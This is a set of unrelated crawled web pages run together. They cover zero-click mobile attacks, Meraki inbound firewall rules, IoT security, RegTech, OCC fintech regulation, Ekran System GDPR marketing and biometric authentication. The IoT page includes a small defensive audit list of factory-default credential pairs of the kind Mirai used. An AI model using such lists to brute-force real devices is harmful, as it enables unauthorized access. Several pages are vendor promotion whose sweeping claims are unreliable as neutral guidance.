The reduced interaction involved in zero-click attacks means fewer traces of any malicious activity. This – plus the fact that the vulnerabilities which cybercriminals can exploit for zero-click attacks are quite rare – makes them especially prized by attackers.
Even basic zero-click attacks leave little trace, which means detecting them is extremely difficult. Additionally, the same features which make software more secure can often make zero-click attacks harder to detect. Zero-click hacks have been around for years, and the issue has become more widespread with the booming use of smartphones that store a wealth of personal data. As individuals and organizations become increasingly reliant on mobile devices, the need to stay informed about zero-click vulnerabilities has never been greater.
How does a zero-click attack work?
Typically, remote infection of a target’s mobile device requires some form of social engineering, with the user clicking on a malicious link or installing a malicious app to provide the attacker with an entry point. This is not the case with zero-click attacks, which bypass the need for social engineering entirely.
A zero-click hack exploits flaws in your device, making use of a data verification loophole to work its way into your system. Most software uses data verification processes to keep cyber breaches at bay. However, there are persistent zero-day vulnerabilities that are not yet patched, presenting potentially lucrative targets for cybercriminals. Sophisticated hackers can exploit these zero-day vulnerabilities to execute cyber-attacks, which can be implemented with no action on your part.
Often, zero-click attacks target apps that provide messaging or voice calling because these services are designed to receive and interpret data from untrusted sources. Attackers generally use specially formed data, such as a hidden text message or image file, to inject code that compromises the device.
A hypothetical zero-click attack might work like this:
- Cybercriminals identify a vulnerability in a mail or messaging app.
- They exploit the vulnerability by sending a carefully crafted message to the target.
- The vulnerability allows malicious actors to infect the device remotely via emails that consume extensive memory.
- The hacker's email, message, or call won't necessarily remain on the device.
- As a result of the attack, cybercriminals can read, edit, leak, or delete messages.
The hack can be a series of network packets, authentication requests, text messages, MMS, voicemail, video conferencing sessions, phone calls, or messages sent over Skype, Telegram, WhatsApp, etc. All of these can exploit a vulnerability in the code of an application tasked with processing the data.
The fact that messaging apps allow people to be identified with their phone numbers, which are easily locatable, means that they can be an obvious target for both political entities and commercial hacking operations.
The specifics of each zero-click attack vary depending on which vulnerability is being exploited. A key trait of zero-click hacks is that they tend to leave no traces behind, making them very difficult to detect. This means it is not easy to identify who is using them and for what purpose. However, intelligence agencies worldwide reportedly use them to intercept messages from suspected criminals and terrorists and to monitor their whereabouts.
Examples of zero-click malware
A zero-click vulnerability can affect various devices, from Apple to Android. High profile examples of zero-click exploits include:
Apple zero-click, ForcedEntry, 2021:
In 2021, a Bahraini human rights activist had their iPhone hacked by powerful spyware sold to nation-states. The hack, uncovered by researchers at Citizen Lab, had defeated security protections put in place by Apple to withstand covert compromises.
Citizen Lab is an internet watchdog based at the University of Toronto. Its researchers analyzed the activist’s iPhone 12 Pro and found that it had been hacked via a zero-click attack, which took advantage of a previously unknown security vulnerability in Apple’s iMessage to push Pegasus spyware, developed by the Israeli firm NSO Group, onto the activist’s phone.
The hack attracted significant news coverage, mainly because it exploited the latest iPhone software at the time: iOS 14.4 and, later, iOS 14.6, which Apple released in May 2021. The hack overcame a security feature built into all versions of iOS 14, called BlastDoor, which was intended to prevent this kind of device hack by filtering malicious data sent over iMessage. Because of its ability to overcome BlastDoor, the exploit was dubbed ForcedEntry. In response, Apple upgraded its security defenses with iOS 15.
WhatsApp breach, 2019:
This infamous breach was triggered by a missed call, which exploited a flaw in the source code framework of WhatsApp. A zero-day exploit – i.e., a previously unknown and unpatched cyber vulnerability – allowed the attacker to load spyware in the data exchanged between two devices due to the missed call. Once loaded, the spyware enabled itself as a background resource, deep within the device’s software framework.
Jeff Bezos, 2018:
In 2018, Crown Prince Mohammed bin Salman of Saudi Arabia allegedly sent Amazon CEO Jeff Bezos a WhatsApp message with a video promoting Saudi Arabia’s telecom market. It was reported that there was a piece of code within the video file that enabled the sender to extract information from Bezos’s iPhone over several months. This resulted in the capture of text messages, instant messages, and emails, and possibly even eavesdropped recordings taken with the phone’s microphones.
Project Raven, 2016:
Project Raven refers to the UAE’s offensive cyber operations unit, which comprises Emirati security officials and former US intelligence operators working as contractors. Reportedly, they used a tool known as Karma to take advantage of a flaw in iMessage. Karma used specially crafted text messages to hack into the iPhones of activists, diplomats, and rival foreign leaders to obtain photos, emails, text messages, and location information.
How to protect yourself from zero-click exploits
Because zero-click attacks are based on no interaction from the victim, it follows that there isn’t much you can do to protect yourself. While that is a daunting thought, it’s important to remember that, in general, these attacks tend to be targeted at specific victims for espionage purposes or perhaps monetary gain.
That said, practicing basic cyber hygiene will help to maximize your online safety. Sensible precautions you can take include:
- Keep your operating system, firmware, and apps on all your devices up to date as prompted.
- Only download apps from official stores.
- Delete any apps you no longer use.
- Avoid ‘jailbreaking’ or ‘rooting’ your phone since doing so removes protection provided by Apple and Google.
- Use your device's password protection.
- Use strong authentication to access accounts, especially critical networks.
- Use strong passwords – i.e., long and unique passwords.
- Regularly back up your systems. Systems can be restored in cases of ransomware, and having a current backup of all data speeds up the recovery process.
- Enable pop-up blockers or prevent pop-ups from appearing by adjusting your browser settings. Scammers routinely use pop-ups to spread malware.
Using a comprehensive antivirus will also help keep you safe online. Kaspersky Total Security provides 24/7 protection against hackers, viruses, and malware, plus payment protection and privacy tools that protect you from every angle. Kaspersky Internet Security for Android will likewise protect your Android device.
When configuring a firewall for a network, the direction of traffic must be taken into account. Some traffic, like users browsing to the internet, is initiated outbound. Other traffic, like access to a publicly facing server, initiates with an inbound connection. These situations are handled differently, since you can generally trust your users more than connections from the internet.
For outbound traffic, controlling this is an easy process: create an allow rule using the Layer 3 Firewall. This will affect 1:1 NATs, Port Forwards and standard WAN traffic. More information about the outbound firewall feature is available here. The inbound firewall is controlled a little bit differently.
The inbound firewall will deny any traffic that does not have a session initiated by a client behind the MX. This allows internal client machines to connect with any resources they need, but does not let outside devices initiate connections with inside client machines. The exception to this is if a Port Forward or 1:1 NAT is created. More information on Port Forwarding and 1:1 NAT can be found here.
Both Port Forwards and 1:1 NATs have a section for 'Allowed remote IPs'. This governs which outside addresses are allowed to initiate connections. Addresses specified here will be able to connect through the specified public ports. The 'ANY' keyword can be used to grant access to any address, or multiple addresses can be entered if they are separated by commas. By specifying the addresses that should be communicating with inside nodes, unsolicited connections are prevented.
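To make the semantics of such a field concrete, here is an illustrative sketch of how an 'Allowed remote IPs' value could be evaluated: comma-separated entries, with 'ANY' matching every source. This is a hypothetical re-implementation for explanation only, not the MX's actual code, and the CIDR-range support shown here is an assumption:

```python
import ipaddress

def remote_ip_allowed(remote_ip: str, allowed_field: str) -> bool:
    """Check a connection's source IP against an 'Allowed remote IPs' field.

    The field is a comma-separated list of addresses (CIDR ranges are
    assumed to be accepted here); the keyword 'ANY' permits all sources.
    Illustrative logic only, not the appliance's real implementation.
    """
    entries = [entry.strip() for entry in allowed_field.split(",")]
    if any(entry.upper() == "ANY" for entry in entries):
        return True
    source = ipaddress.ip_address(remote_ip)
    return any(source in ipaddress.ip_network(entry, strict=False)
               for entry in entries)

print(remote_ip_allowed("203.0.113.7", "198.51.100.4, 203.0.113.0/24"))  # True
print(remote_ip_allowed("192.0.2.1", "198.51.100.4"))                    # False
print(remote_ip_allowed("192.0.2.1", "any"))                             # True
```

A source address that fails this check simply never establishes an inbound session, which is why restricting this field is an easy win for reducing the exposed surface of a Port Forward.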
Below is an example of both Port Forwarding and 1:1 NAT rules.
Restricting inbound access is an important part of increasing security within a network. By either restricting inbound connections or limiting outbound replies, unwanted traffic can be minimized. | <urn:uuid:966d32bb-1bed-48f2-9812-88122d18e92a> | CC-MAIN-2022-40 | https://documentation.meraki.com/MX/NAT_and_Port_Forwarding/Blocking_Inbound_Traffic_on_MX_Security_Appliances | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00362.warc.gz | en | 0.904126 | 370 | 3.09375 | 3 |
Top Security Concerns Related to the Internet of Things
Fremont, CA: The Internet of Things (IoT), which connects everything to the Internet, is one of the hottest technologies of the digital transformation age. Smart houses, self-driving vehicles, smart utility meters, and smart cities all use this technology. However, there are many security concerns for the future of the IoT.
While IoT devices enable effective communication between devices, automate processes, save time and money, and provide other benefits, one fear among consumers remains IoT security. There have been certain occurrences that have made it challenging to trust IoT devices.
Several smart TVs and cash machines have been hacked, resulting in a loss of confidence among customers and businesses alike. With that in mind, let's look at some of the most pressing security concerns for the future of the IoT.
• Malware and ransomware
Due to the fast growth of IoT products, cyberattack variants are becoming unpredictable. Cybercriminals have evolved to the point where they can even lock customers out of their own devices.
• Outdated hardware and software
Because IoT devices are becoming more popular, manufacturers are focused on creating new ones rather than paying adequate attention to security.
The majority of these devices do not receive enough updates, and some do not receive any at all. This means that a device may be secure when purchased but becomes vulnerable to attack once hackers discover faults or security flaws.
When these flaws are not addressed through regular hardware and software upgrades, the devices remain vulnerable to attack. Frequent updates are necessary for everything connected to the Internet, and skipping them can result in data breaches that affect both consumers and manufacturers.
• Use of weak and default credentials
Many IoT firms ship devices with default credentials, such as an admin account. To attack a device, hackers only need the username and password: they use brute-force tactics to guess the credentials and infect the device once they gain access to the account.
The Mirai botnet attack was carried out by exploiting default credentials left on devices. Consumers should change the default credentials as soon as they receive a device, and most manufacturers say so in the instruction manuals. If the default credentials are not changed, the devices remain vulnerable to attack.
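The defense is straightforward to automate: audit devices against a list of known factory defaults. The sketch below is illustrative; the credential list is a tiny hypothetical sample (real wordlists, like the one hardcoded into Mirai, contain dozens of pairs), and the device entries are invented:

```python
# A tiny, hypothetical sample of factory-default credential pairs.
# Real dictionaries (such as Mirai's) are much longer.
DEFAULT_CREDENTIALS = {
    ("admin", "admin"),
    ("root", "root"),
    ("admin", "1234"),
    ("user", "user"),
}

def uses_default_credentials(username: str, password: str) -> bool:
    """Return True if a device is still configured with factory defaults."""
    return (username, password) in DEFAULT_CREDENTIALS

devices = [
    {"name": "camera-01", "user": "admin", "password": "admin"},
    {"name": "router-01", "user": "admin", "password": "x7#Qk9!pLm2"},
]
for device in devices:
    if uses_default_credentials(device["user"], device["password"]):
        print(f"{device['name']}: factory-default credentials, change them now")
```

The same check is what attackers run in reverse, which is why changing the defaults on day one closes the single most common entry point.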
Last year, like many of us, I binge-watched TV series to beat the lockdown blues. In my favourite and the most popular of them all, The Money Heist, the Professor, the ethical protagonist with unquestionable moral values, justifies his crime of minting money for himself and his team because governments all over the globe do the same to bail out big financial institutions and save the connected economy from crisis. Though the series brings up various moral dilemmas, this underlying premise around which the whole story was woven was left undebated. The series’ popularity suggests, in any country, the public holds the same view.
The toughening regulations and public panic
After the 2008 financial crisis, the public was angry against governments for deeming the large financial institutions non-guilty or too big to be judged guilty, even when their actions clearly caused an economic slowdown and impacted the whole globalized world.
This view affected not just the economy but also the next elections in the countries most affected. To reduce public discontent, they toughened financial regulations that review financial decisions of firms and keep their risks within acceptable limits.
The toughening regulations have two problems. Small companies that focus their resources on innovation cannot spend them on having a regulatory compliance team to help them make decisions that abide by the complex financial laws. Bad financial decisions may cost them heavy reparations. This makes businesses risk-averse, suppresses innovation, and is bad for the economy.
The other problem is, many judge regulatory non-compliance to be fraudulent even when it is only a poor business judgement. This would affect share prices and can threaten the very existence of the firm in question.
The new Social Dilemma
It is not only financial institutions that need regulation. Though technology helped us get through 2020, the pandemic year, we are now more aware of the negative impact of Big Tech.
Tech gadgets and apps have been stalking us for years. Most believe that corporates in this capitalist world put profits above people, an opinion popularized paradoxically by various social media pages and movies like ‘The Social Dilemma’.
So, we think it is the government’s duty to regulate corporate firms. The recent global outrage against the new security policy of WhatsApp proves the need for better regulation and increasing digital security awareness.
The Problem of Regulations
It is impossible to manually regulate digital technologies. How do governments update their systems to regulate businesses? How do they assess whether their regulations are strict enough to check fraud but not so tight that they suppress economic growth?
How do they regulate financial institutions in the fast-evolving, volatile, and connected business ecosystem, not only to gain public trust but also for the greater common good of the businesses, their stakeholders, and the economy?
The volatile business ecosystem demands frequently changing regulations. How can corporates and their compliance teams abide by the changing laws effectively and calculate essential risks that they may have to take?
RegTech as self-adapting digital solutions for FinTech and Beyond
RegTech was conceptualized as a branch of FinTech, to digitize regulations applicable to financial institutions. Governments apply RegTech digital solutions to monitor financial institutions and gather timely reports of non-compliance and risk assessment. RegTech applications are also used by businesses to monitor themselves, verify legal compliance, and avoid legal tussles. These applications check and assess risks and help them choose profitable options.
Though RegTech is popular as GRC (Governance, risk management, and compliance) digital solutions, it is growing beyond FinTech with wide applications. Some of these solutions are being used to regulate technologies. Many digital products have become essential to us.
During the lockdown, we shopped digitally, paid bills using digital wallets, celebrated events virtually, learnt from many webinars. Most of these changes will stay beyond the pandemic scare and these new habits will force many regulatory changes.
Regulatory bodies are mostly understaffed and underfunded. They are trying hard to make sense of the continuously evolving and complex financial ecosystem and regulatory frameworks. Sophisticated, adaptable, and reliable auto-regulatory frameworks built on novel technologies like AI, blockchain, and Big Data can take the load and break down the complexity. Machine learning models learn, predict, and evolve to keep pace with FinTech advancements as well as regulatory changes.
Compliable laws should closely follow market realities.
We cannot apply laws made for non-digital markets to digital ones. RegTech solutions algorithmize existing laws and check them for relevance. However, it is not easy to translate legal principles into algorithms, and this brings new problems, such as: how do you assess intent with an algorithm?
How to determine if a company made a bad financial decision to make profits at the cost of breaking a law or hurting the economy? How to differentiate a bad financial decision from intentional fraud?
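To make "algorithmizing a law" concrete, here is a deliberately simple sketch of one compliance rule expressed as code. The threshold and jurisdiction list are hypothetical, invented for illustration and not taken from any real regulation; note that the rule can encode amounts and jurisdictions, but says nothing about intent, which is exactly the gap described above:

```python
from dataclasses import dataclass

@dataclass
class Transaction:
    amount: float
    country: str

# Hypothetical rule: transactions above a threshold, or routed through a
# listed jurisdiction, must be reported. Values are illustrative only.
REPORTING_THRESHOLD = 10_000.0
LISTED_JURISDICTIONS = {"XX", "YY"}

def requires_report(tx: Transaction) -> bool:
    """A single regulatory rule rendered as an executable check."""
    return tx.amount > REPORTING_THRESHOLD or tx.country in LISTED_JURISDICTIONS

transactions = [Transaction(12_500, "US"), Transaction(900, "XX"),
                Transaction(500, "DE")]
flagged = [tx for tx in transactions if requires_report(tx)]
print(len(flagged))  # 2 of the 3 transactions must be reported
```

A full RegTech system layers many such checks, keeps them versioned as the underlying laws change, and augments them with statistical models for the judgments that fixed thresholds cannot capture.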
It may sound impossible, but we are slowly heading towards such complicated RegTech solutions powered by robotic systems built on AI, ML, BigData, Natural Language Processing, Blockchain and other latest technologies. Sceptics may call technology untrustworthy.
Yes, there will be challenges, and humans will have to manually intervene to resolve issues. Despite the issues that technology might bring us, experts agree that RegTech is the most effective solution to digitize regulations in line with the changes in human communications and transactions in our society.
RegTech for the new digitized society
Digitization is expanding our regulatory frameworks to new needs of the society, new business collaborations in new contexts, and new rules and regulations. Many governments have been trying various RegTech solutions to analyze data produced by big financial institutions to make more efficient and appropriate regulations.
The success of these pilot projects gave many businesses the needed confidence to invest in RegTech innovations and the sector has been attracting huge investments.
RegTech Businesses are expected to grow quite fast in this decade. The industry news of new collaborations between software and compliance regulation firms we hear every now and then proves the point.
A start-up approached coMakeIT for an end-to-end RegTech solution, a customizable, domain-agnostic, cloud-native GRC solution. We put together an agile product team to provide the start-up a full suite of product engineering services ranging from architecture, technology choice, UX design, development, CI/CD/CT, and DevOps.
The detailed roadmap we defined, and the MVP we quickly developed assured them of market validation. This helped the start-up fulfil its ambitious goal without worrying about setting up a technology and engineering team.
These collaborations advance the use of analytical software solutions in regulatory monitoring, compliance, and risk-assessment and broaden RegTech to new domains. Many GRC firms now have dedicated cybersecurity and technology risk assessing teams.
It is interesting to note that this is all happening when more traditional non-software firms are slowly adopting digitalization and are being run as software companies.
It is not easy.
With so much data travelling through our web applications, and so many changes happening in the ecosystem, risk assessment and regulatory compliance are extremely difficult.
RegTech solutions eliminate human errors and assess risk with advanced and perpetually evolving models. They can be authenticated automatically by reliable systems such as blockchain, the technology underlying digital currencies like Bitcoin, and are hence safer than non-digital frameworks.
The essential RegTech
RegTech solutions are indispensable for solving changing regulatory problems in a digital ecosystem, and they solve them from both ends: they provide regulators with sophisticated technical methods that automatically supervise institutions and check for financial fraud, and they encourage companies to assess risks and innovate.
RegTech makes regulations and compliance easy and reliable and thus prevents companies from making bad financial decisions. It saves small start-ups time and spares them huge losses from reparations for security failures. It fosters innovation, reduces risk, and forges new collaborations while automating various trading compliances.
With new vistas opening in RegTech, the sector is growing fast to meet the needs of our digital society. These new advancements give us the hope that RegTech can shape our new digital connected society into a more just one. | <urn:uuid:1e891b0b-8cf8-42e1-87c4-a6783d7386a3> | CC-MAIN-2022-40 | https://www.comakeit.com/blog/regtech-the-evolving-art-of-regulating-fintech-and-beyond/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00362.warc.gz | en | 0.943952 | 1,651 | 2.546875 | 3 |
Information technology — especially the Internet — can have a positive impact on the U.S. financial system. Used improperly, however, such tools have the potential to wreak havoc on the financial sector and consumers.
The Office of the Comptroller of the Currency, a unit of the U.S. Department of the Treasury, has launched an initiative on the future of e-commerce finance in light of technology innovation. While acknowledging the advantages of technology, the agency also is worried about the negative impact on financial markets and how it should direct its regulatory program in the future.
The OCC is seeking input from the IT industry, financial enterprises and the public, and has published a white paper outlining its concerns. The deadline for comments on the white paper is May 31.
The benefits of IT in the financial sector include improved productivity in conducting transactions, consumer convenience and system reliability. Dangers include data entry errors, the vulnerability of consumer records and privacy issues.
The Emergence of Fintechs
What also worries the comptroller’s office is the use of technology in creating new kinds of financial intermediaries that would not exist without the Internet. They are broadly referred to as “fintech companies” and include new services such as online payments providers, commercial online lenders and peer-to-peer lending platforms. The OCC is concerned that some of these new entities may not be adequately funded.
The OCC also is concerned about innovative financial products that could mirror the unconventional mortgage entities associated with the financial meltdown of 2008 and 2009.
“But recalling the lessons of the financial crisis, when some innovative products such as subprime mortgages and financially engineered securitizations were used in ways that had disastrous consequences for individuals, communities and our economy, we want to be sure that the banks and thrifts we supervise innovate in a way that is compatible with safety and soundness and consistent with consumer protection laws and regulations,” said U.S. Comptroller of the Currency Thomas Curry.
“In short, what we are trying to encourage is responsible innovation,” he said at a Harvard University forum in March where he previewed the OCC program.
The OCC charters, regulates and supervises all national banks and federal savings associations as well as federal branches and agencies of foreign banks. Its goal is to ensure that these organizations operate in a safe manner, offer fair access to financial services, treat customers fairly, and observe laws and regulations.
The OCC white paper is titled “Supporting Responsible Innovation in the Federal Banking System: An OCC Perspective.” The agency is concerned about its own ability to become more agile and expeditious in its regulatory processes so as to encourage what it considers proper innovation, it revealed in the document. That effort will include utilizing and improving technological expertise within the agency as well as reaching out to the finance and technology sectors for guidance.
OCC Provides a List of Concerns
Other areas of concern are ensuring that banks, nonbanks and fintech providers adopt appropriate risk management tools to address cybersecurity weaknesses associated with existing services as well as with services or products resulting from innovations in technology.
While mobile technologies and social media could enhance access to financial services in underserved communities, the OCC expressed concerns about the importance of brick-and-mortar banking outlets in such communities.
Importantly, in its traditional role of ensuring stability in the finance sector, the OCC raised the question of how fintechs will address that issue.
“Our job is to help ensure that banks of all sizes are capable of withstanding economic storms so that they can continue to support their communities and their customers,” Curry said.
“I would worry about the staying power of some of the new types of lenders. One of the great virtues of community banks is that they know their customers and they stand behind them in good times and bad. I’m not so sure that customers selected by an algorithm would fare as well in a downturn,” he said.
The OCC’s framework for the innovation initiative consists of several elements, according to a statement provided to the E-Commerce Times by spokesperson Bryan Hubbard. They include the following:
- Be sure we have the capacity to identify and understand new trends and technology, as well as the emerging needs of the consumers of financial products.
- Be sure we’re in a position to quickly evaluate products that require regulatory approval and identify the risks that go with them — as well as the safeguards that will be necessary to manage those risks.
- Be a resource for banks and thrifts looking for guidance on our supervisory expectations as they consider new and innovative products.
Finance Groups Appreciate Effort
Business groups generally endorsed the OCC initiative. The agency’s “focus on responsible innovation lines up with our core belief that banks should be empowered to innovate and that consumers should feel confident they have the same protections when doing business with any financial services provider — bank or a nonbank,” said Rob Nichols, president and CEO of the American Bankers Association.
“Banks are helping consumers by delivering innovative products and pursing new partnerships. The OCC’s efforts are an important piece of a broader discussion on how fintech fits into the current regulatory structure,” he said.
“The payments industry is heavily regulated at the state and federal levels. We urge all regulators to work together to avoid duplication and unnecessary regulatory burdens. The OCC calls for cooperation and coordination of the regulators and we applaud this approach,” said Scott Talbott, senior vice president for government affairs at the Electronic Transactions Association.
“More and more, we see regulators studying the modern electronic payments system. It is wise to take the time to understand how technology is changing payments and benefiting consumers, merchants and the economy. The key is what next step regulators take: measured reaction or overreaction?” he told the E-Commerce Times.
“It’s the centuries-old question — how to balance regulation and innovation. The OCC strikes the right tone by acknowledging this debate and recommending proceeding carefully,” Talbott said.
The document lacks specificity and mainly deals with high-level principles, Randy Benjenk and Michael Nonaka of Covington & Burling said in an analysis of the OCC white paper. For example, the OCC did not address “the sometimes significant legal and supervisory barriers that banks face” regarding innovation.
Banking sector investments in fintech companies remain subject to the activity restrictions and additional requirements of the National Bank Act, the Home Owners’ Loan Act and other key statutes, they noted. Also, fintech companies that provide services to banking organizations potentially are subject to provisions of the Bank Service Company Act.
“The white paper also does not address the relevance of banks’ assessment areas for purposes of the Community Reinvestment Act performance evaluations as online and mobile banking use increases. In addition, the document does not discuss the chartering of fintech companies, although the comptroller’s remarks released in conjunction with the white paper touch on this subject,” Benjenk and Nonaka said.
The OCC also failed to address the larger question of whether new types of regulation should to apply to innovative methods for delivering financial services, whether or not delivered by banks, according to the analysis.
“Nevertheless, the white paper clearly represents a spark for further discussions on the issues surrounding bank innovation, and signals a new focus by the OCC on addressing the issues in a way that balances the industry’s commercial interests, consumer interests, and safety and soundness considerations,” Benjenk and Nonaka said.
The OCC on June 23 will host a forum on innovation in Washington, D.C. | <urn:uuid:07a1d11b-ab99-4e76-9fd6-9d62b001d772> | CC-MAIN-2022-40 | https://www.linuxinsider.com/story/treasury-department-examines-internets-impact-on-finance-system-83413.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00362.warc.gz | en | 0.949477 | 1,617 | 2.609375 | 3 |
GDPR Compliance Solutions
The General Data Protection Regulation (GDPR) is a European Union regulation that came into force on 25 May 2018 to ensure the protection and security of personal data.
The GDPR provides EU residents with control over their personal data and obliges any organizations that collect and process data related to EU citizens to comply with strict regulations, regardless of where those organizations are located. GDPR compliance is required whether data processing takes place within or outside the EU.
These regulations unify rules regarding the handling of personal data across all EU Member States, aiming to simplify compliance with data protection standards and all related legal procedures.
Key GDPR data protection measures
The GDPR protects the rights of data subjects (individuals) who provide their personal data to data controllers (persons or companies that determine the purposes and means of using personal data) and data processors (persons or companies that process personal data on behalf of data controllers) based within the EU as well as outside the EU if they offer goods and services to EU residents.
The GDPR obliges organizations to process users’ personal data lawfully, fairly, and transparently. To accomplish this aim, the GDPR implements the following measures:
The one-stop-shop principle. The GDPR unifies the handling of all matters regarding personal data across the EU. Thus, data subjects can file complaints in their country of residence even if their data was processed by a company based in another EU country or outside the EU.
Expanded rights of data subjects. Under the GDPR, data subjects have the following rights:
- be informed that their data is being collected
- access their personal data
- request rectification of incorrect data
- oblige a data controller to erase their personal data
- object to the processing of their data
- transfer their data to other services
High security standards. The GDPR obliges companies to implement all necessary security measures such as data encryption, access control, monitoring of processing activities, etc. to protect personal information.
Data protection officers. Organizations that process large quantities of personal data have to appoint a data protection officer who will monitor GDPR compliance and process requests from data subjects.
Penalties for non-compliance. With a tiered approach, the severity of a penalty depends on the severity of the violation. The maximum penalty for failure to comply with the GDPR is up to 4% of annual global turnover or up to €20 million, whichever is greater.
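That tiered cap can be expressed as a one-line formula. The sketch below is illustrative only; the turnover figures are made-up examples, not from any real enforcement case.

```python
def gdpr_max_fine(annual_global_turnover_eur: float) -> float:
    """Upper bound of a GDPR penalty: 4% of annual global turnover
    or EUR 20 million, whichever is greater."""
    return max(0.04 * annual_global_turnover_eur, 20_000_000)

# A company with EUR 1B in global turnover faces a cap of EUR 40M,
# while a smaller company is still capped at the EUR 20M floor.
print(gdpr_max_fine(1_000_000_000))  # 40000000.0
print(gdpr_max_fine(100_000_000))    # 20000000
```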
Using Ekran System to meet GDPR requirements
Deploying a specialized monitoring solution is an excellent way to ensure GDPR compliance. However, it’s essential to know which GDPR requirements a particular product covers.
Ekran System is a full-cycle insider threat management platform that effectively deters, detects, and disrupts insider threats. With its robust user activity and access management functionality, Ekran System can help you meet the requirements of GDPR Articles 5, 24, 32, 33, 35, and 39.
1. Demonstrate compliance
Demonstrate compliance with GDPR Articles 5 and 24 by proving that all data is processed legally and with all possible security measures applied.
Deploy Ekran System as a GDPR compliance solution to gather an audit trail and use it as clear evidence of compliance, as it demonstrates how and by whom data was processed.
- Record everything that happens within user sessions.
- Explore context-rich recordings of launched applications, visited URLs, typed keystrokes, executed commands, etc.
- Benefit from one-click search across suspicious activity to present a complete tamper-proof audit trail of user activity.
2. Maintain records of processing activities
Meet GDPR Articles 24 and 39 that require you to maintain records of all activities related to data processing and clearly know how and by whom sensitive data is processed.
Use Ekran System monitoring functionality to prove that your company processes all personal data in keeping with GDPR requirements and can quickly detect and mitigate any data security incidents:
- Record everything that happens within user sessions.
- Explore context-rich recordings of applications launched, URLs visited, keystrokes typed, commands executed, etc.
- Benefit from one-click search across suspicious activity to gather a complete tamper-proof audit trail of user activity.
3. Strengthen your data protection
Implement various technical and procedural measures to secure users’ personal data as per GDPR Articles 32 and 35.
- Secure your critical data by making sure it can only be accessed by authorized users.
- Customize real-time responses to protect sensitive data and educate users on prohibited actions.
- Detect anomalies in user behavior with an AI-powered user behavior analytics module.
- Ensure secure but convenient work for users with a lightweight PAM solution.
4. Detect and investigate security incidents
Comply with the requirements of GDPR Article 33, which obliges you to disclose any incidents that can pose a risk to data subjects within 72 hours of detecting them.
Leverage Ekran System’s robust security incident investigation functionality to detect incidents, investigate them quickly, and report all results before the 72-hour deadline imposed by the GDPR.
- Detect potential incidents with predefined and custom alerts.
- Get an immediate live session view of any user session to see a user’s actions before and during an incident.
- Respond instantly to an identified incident by sending a warning message or blocking the session.
- Gather all evidence in a tamper-proof format for further forensic investigation.
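The 72-hour window in Article 33 is absolute clock time measured from detection, which is simple to compute. The detection timestamp below is a made-up example:

```python
from datetime import datetime, timedelta

# Moment the breach was detected (hypothetical example).
detected = datetime(2024, 5, 1, 9, 30)

# Article 33 notification deadline: 72 hours after detection.
report_deadline = detected + timedelta(hours=72)
print(report_deadline.isoformat())  # 2024-05-04T09:30:00
```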
Ekran System – Your solution for GDPR compliance
Ekran System provides a complete tamper-proof audit trail of everything that happens during each user session, allowing you to instantly detect and mitigate insider threats.
With comprehensive insider threat protection functionality, reliable detection tools, and a high potential for incident investigation, Ekran System is the right solution for meeting GDPR requirements. | <urn:uuid:938423af-234b-4ff9-a423-49992c78fa84> | CC-MAIN-2022-40 | https://www.ekransystem.com/en/solutions/meeting-compliance-requirements/gdpr-compliance | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00362.warc.gz | en | 0.905271 | 1,209 | 2.5625 | 3 |
In the world of information technology, the term “biometrics” (also referred to as “biometric authentication”) is the automated method of recognizing a person based on their unique physiological or behavioral traits. Common examples of human biometric markers are fingerprints, finger and palm veins, iris and facial recognition, even one’s voice print.
According to Microsoft’s chairman and chief software architect, Bill Gates, biometrics is one of the keys to providing “a more transparent, secure and manageable security on a mass scale.”
Need for a stronger user authentication
In this computer-driven era, identity theft and the loss or disclosure of sensitive data and related intellectual property are growing rapidly. Currently, options available for user authentication fall within three categories – those that require what you know (e.g. passwords), those that require what you have (e.g. smart cards) and those that verify who you are (e.g. biometric characteristics).
Long, complex and unmemorable alphanumeric passwords are hard to remember but recommended by system administrators. Smart cards provide higher assurance levels for authentication over passwords but there’s the issue of lost or stolen cards. Since physically having a smart card is required for authentication, what does an employer do if an employee loses or leaves his or her card at a public location?
Among all three authentication techniques, biometrics are the most advanced form of identification and verification. The events of September 11, 2001, have spurred a great deal of interest in further enhancement or refinement of this technology.
Biometrics provide strong security
Passwords have been the standard means of user authentication for decades on our home and office computers. However, as users are required to remember more, longer, and constantly changing passwords, it is evident that a more convenient and secure solution to user authentication is necessary.
Biometric authentication techniques are exceptionally reliable for a positive identity match. A false acceptance or false rejection is rare, although possible, depending on the accuracy of the biometric system and sensor characteristics. Incorporation of a liveness detection technique makes an attack against the biometric system more difficult. Our Enterprise Biometrics Suite™ is an enterprise-ready, biometric-based Single Sign On (SSO) solution that provides an air-tight mechanism to authenticate users requesting access to network resources.
Different biometric systems provide different levels of security as measured by false acceptance rate (FAR) and false rejection rate (FRR) scores. For example, iris biometrics and vascular (finger vein and palm vein) biometrics usually offer lower FAR and FRR rates than non-contact technologies such as facial or voice recognition. However, before rejecting any biometric type on the grounds of its FAR and FRR scores, it is important to consider what level of security you need a biometric system to provide.
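FAR and FRR are simple ratios over labeled comparison attempts, and the trade-off between them is controlled by the match threshold. The sketch below uses made-up similarity scores, not data from any real biometric system:

```python
def far_frr(genuine_scores, impostor_scores, threshold):
    """Accept a comparison when its similarity score >= threshold."""
    false_rejects = sum(s < threshold for s in genuine_scores)
    false_accepts = sum(s >= threshold for s in impostor_scores)
    frr = false_rejects / len(genuine_scores)   # genuine users wrongly rejected
    far = false_accepts / len(impostor_scores)  # impostors wrongly accepted
    return far, frr

genuine = [0.91, 0.87, 0.78, 0.95, 0.66]   # same-person comparisons
impostor = [0.12, 0.34, 0.71, 0.22, 0.05]  # different-person comparisons
far, frr = far_frr(genuine, impostor, threshold=0.7)
print(f"FAR={far:.2f}, FRR={frr:.2f}")  # FAR=0.20, FRR=0.20
```

Raising the threshold lowers FAR but raises FRR, which is why a high-security deployment tunes the threshold differently than a convenience-focused one.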
It’s also important to take into account the environment a biometric authentication system will be used in. For example, fingerprint readers do not work well in environments where users’ fingers are likely to be dirty. Similarly, voice recognition systems are not a good match for excessively noisy environments. Thus, the strongest deployments combine two or more biometric modalities.
